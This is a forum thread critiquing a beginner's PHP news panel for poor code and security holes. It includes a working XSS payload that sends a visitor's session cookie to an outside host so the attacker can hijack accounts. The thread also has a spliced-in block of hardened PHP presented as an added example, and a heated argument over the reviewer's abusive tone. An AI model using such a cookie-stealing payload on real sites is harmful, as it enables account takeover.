Well basically all I said was "BBCode is easy, when u start javascript it gets hard".
I was just stating a point
Okay.. I don't get why you've done quite a bit on this thing.. first off..
Why the hell can you view the navigation, latest news, and other bits.. without being logged in? I mean seriously.. why would anyone need to know the location of some of the pages "editnews.php" when they're not logged in?
That just makes it more vulnerable.
http://www.tehupload.com/uploads/app...1146864641.png
--------------------------------------
Second.. your coding is absolutely horrible.. I mean seriously.. all you're doing is repeating code OVER and OVER.
Every time you clean something.. you repeat the same lines..
Then to make things even funnier.. you do separate queries for updating the same things!
PHP Code:
$username = stripslashes($username);
$password = stripslashes($password);
$username = mysql_real_escape_string($username);
$password = mysql_real_escape_string($password);
Do you really not know how to code? I mean seriously.. two queries to update the same table with that small bit of information.. my god.
PHP Code:
mysql_query("UPDATE users SET LastLogin = '$LastLogin' WHERE Username = '$username' AND Password = '$password'");
// Update last login ip address
mysql_query("UPDATE users SET LastLoginIP = '$LastLoginIP' WHERE Username = '$username' AND Password = '$password'");
---------------------------------------
Third.. you don't make it other-site compatible!
There's a lot of code to change to make this stupid thing work..
PHP Code:
header('location: http://www.freyta.net/newspanel/');
---------------------------------------
Fourth.. why the hell are you doing ob_start() AND session_start().. I see not one place in this where you are working with buffers/cookies.. at all.. so why do you need it?
---------------------------------------
Fifth.. you have no primary key in users! What's the point in id if it's not auto-increment and a primary key?
http://www.tehupload.com/uploads/app...8269945445.png
http://www.tehupload.com/uploads/app...4232900458.png
---------------------------------------
This really works / looks good :rolleyes:
Very much aligned..
http://www.tehupload.com/uploads/app...6250890648.png
---------------------------------------
Very good protection against XSS! Very much..
http://www.tehupload.com/uploads/app...5551292735.png
http://www.tehupload.com/uploads/app...6244368059.png
---------------------------------------
You're not a consistent coder at all.. one minute you're doing **** like this:
http://www.tehupload.com/uploads/app...5419684422.png
Then this..
http://www.tehupload.com/uploads/app...0116054974.png
Stick with something for god sakes..
---------------------------------------
LOL at this! What a good query..
Have you never heard of inserting variables into a string? My god..
PHP Code:
$sql = "INSERT INTO activity (username,activity, ip, date) VALUES ('" . $author . "', '" . $activity . "', '" . $IP . "', '" . $date . "')";
Because that was so hard..
PHP Code:
$sql = "INSERT INTO `activity` (`username`, `activity`, `ip`, `date`) VALUES('{$author}', '{$activity}', '{$IP}', '{$date}')";
---------------------------------------
Back to the XSS thing.. so now that we've proved it has XSS vulnerabilities.. how easy is it to take over the entire panel.. now that the "Latest News" is shown to anyone who views the panel.. logged in or not..
This is easy..
http://www.tehupload.com/uploads/app...7734761346.png
But what about something like this?
Of course redirecting it to a much.. how can I say.. annoying? Site would be just as easy..
Code:
<script>window.location = "http://www.google.com";</script>
Or we could get even more advanced (if the panel had user levels).. and begin stealing admin's sessions..
How about something like that? Now we have the user's PHPSESSID and can easily "become them".. because all you check is the $_SESSION['username'].. nothing else..
Code:
<script type="text/javascript">
var div = $('header');
var element = document.createElement('img');
element.src="http://mysite.com/test.php?cookie="+encodeURI(document.cookie);
element.style.display = "none";
div.appendChild(element);
</script>
how secure..
---------------------------------------
All I can say.. is this is a pile of crap.. it halfway works.. looks like crap.. extremely bad coding.. extremely insecure.. and I wouldn't recommend anyone use it.
There are LOADS more things I could say.. and point out.. almost all the panel's coding has at least something to laugh at..
I've went through about 3 of the pages.. and it was a laugh fest.. so maybe you should work on that ;)
0.5/10
- Caleb
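A hardened version of the three spots the review above picks on (the duplicated login-update queries, the session that is only ever checked by username, and the "Latest News" block that prints stored text straight into the page), as an added example and not code from the panel or from Caleb. It assumes a mysqli connection $db and the users table columns named in the review; the function and parameter names are assumptions.

```php
<?php
// Added example, not code from the panel or from the review. Assumes a mysqli
// connection $db and the `users` table columns (Username, Password, LastLogin,
// LastLoginIP) named in the review; function and parameter names are assumed.

// Session setup before session_start(): an HttpOnly session cookie is not
// readable from document.cookie, so the injected <img src=...?cookie=...>
// payload shown in the review has nothing to send.
function startSession(): void {
    ini_set('session.cookie_httponly', '1');
    session_start();
}

// After a successful login, issue a fresh session id so an id a visitor held
// before authenticating cannot be replayed as the logged-in user.
function markLoggedIn(string $username): void {
    session_regenerate_id(true);
    $_SESSION['username'] = $username;
}

// One UPDATE instead of two: both columns change in the same row. Binding
// parameters replaces the repeated stripslashes()/mysql_real_escape_string()
// lines and keeps user input out of the SQL text entirely.
function recordLogin(mysqli $db, string $username, string $password,
                     string $ip, string $when): bool {
    $stmt = $db->prepare(
        'UPDATE users SET LastLogin = ?, LastLoginIP = ? '
        . 'WHERE Username = ? AND Password = ?'
    );
    $stmt->bind_param('ssss', $when, $ip, $username, $password);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

// Output escaping for the "Latest News" block, which the review shows is
// visible to anyone. Stored text is encoded when printed into HTML, so a saved
// <script> tag is displayed as text rather than run in the viewer's browser.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function renderNews(array $items): string {
    $out = '';
    foreach ($items as $item) {
        $out .= '<div class="news"><h3>' . h($item['title']) . '</h3>'
              . '<p>' . h($item['body']) . '</p></div>' . "\n";
    }
    return $out;
}
```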
There was no need for all of that Caleb..
I saw a need for it.. and that's what matters.. considering it was my post :rolleyes:.
He's releasing it for the public to use.. and it should be proven that it's not safe enough to be used on a public site, nor is it of quality coding.
I don't really see a need for your post above.. ;)
What was the need in really insulting his project beyond belief? Instead you could have just pointed out where he's gone wrong in a mature and sensible manner? Everybody has to start somewhere. It looks like it's his first project.. stop being such a jackass.
I did point out where he has "gone wrong".. my post is full of ways to interpret how he has gone wrong..
I know he has to "start somewhere".. but if someone doesn't correct the problems he has now.. he's going to turn out to be a coder like you and various other ones.. with misc. bad habits and coding problems.. and ego issues.
Your opinion on "being a jackass" just sums up pretty much your attitude. I'll be a "jackass" if I want to, you're not anyone to stop me.
I didn't say you didn't point out where he went wrong but there was no need to be so abusive and arrogant.
I didn't say anything about you helping him with his coding but when you're insulting him and his project like that it's not right. I don't get how I have ego issues? You should look at your posts and then tell me who has the ego. At least now I can tell what is right and what is wrong.
Granted I'm not one to stop you but if you really gave a damn about his project you should stop using childish comments like this:
Quote:
All I can say.. is this is a pile of crap.. it halfway works.. looks like crap..
If that's not being a jackass I don't know what is? You started somewhere once and you've developed into one of them egotistical, arrogant people who now think they're better than anybody in any way possible. Don't think by that I'm saying you're a bad coder because if I did, I'd be lying but I'm sure if you try out a language you don't know and ask for help someone would reply in a much more helpful and mature way.
Quote:
almost all the panel's coding has at least something to laugh at..
Learn to structure your criticism around when you first started.